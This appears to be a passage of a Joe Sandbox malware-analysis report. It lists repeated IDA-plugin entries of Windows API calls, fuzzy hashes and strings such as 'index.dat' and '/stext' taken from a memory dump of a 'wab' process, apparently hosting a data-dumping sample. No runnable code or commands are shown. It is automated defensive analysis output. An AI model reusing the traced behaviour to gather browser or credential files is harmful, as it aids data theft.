                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                            • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 839530781-0
                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindFirst
                                                                                            • String ID: *.*$index.dat
                                                                                            • API String ID: 1974802433-2863569691
                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@mallocmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 3831604043-0
                                                                                            • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                            • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                            • String ID:
                                                                                            • API String ID: 1631957507-0
                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                            • String ID:
                                                                                            • API String ID: 1125800050-0
                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: d
                                                                                            • API String ID: 0-2564639436
                                                                                            • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                            • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: BINARY
                                                                                            • API String ID: 2221118986-907554435
                                                                                            • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                            • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                              • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                              • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                            • String ID:
                                                                                            • API String ID: 1161345128-0
                                                                                            • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                            • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                            • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID: /stext
                                                                                            • API String ID: 2081463915-3817206916
                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 159017214-0
                                                                                            • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                            • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                            • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                            • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                            • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc
                                                                                            • String ID: failed to allocate %u bytes of memory
                                                                                            • API String ID: 2803490479-1168259600
                                                                                            • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                            • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                            • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                            • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                            • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmpmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1065087418-0
                                                                                            • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                            • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                            • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                              • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                              • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                              • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                            • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1481295809-0
                                                                                            • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                            • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                            • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                            • String ID:
                                                                                            • API String ID: 3150196962-0
                                                                                            • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                            • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                            • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$PointerRead
                                                                                            • String ID:
                                                                                            • API String ID: 3154509469-0
                                                                                            • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                            • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                            • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                              • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                              • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                              • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4232544981-0
                                                                                            • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                            • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                            • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID:
                                                                                            • API String ID: 3664257935-0
                                                                                            • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                            • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                            • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$FileModuleName
                                                                                            • String ID:
                                                                                            • API String ID: 3859505661-0
                                                                                            • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                            • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                            • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                            • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                            • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
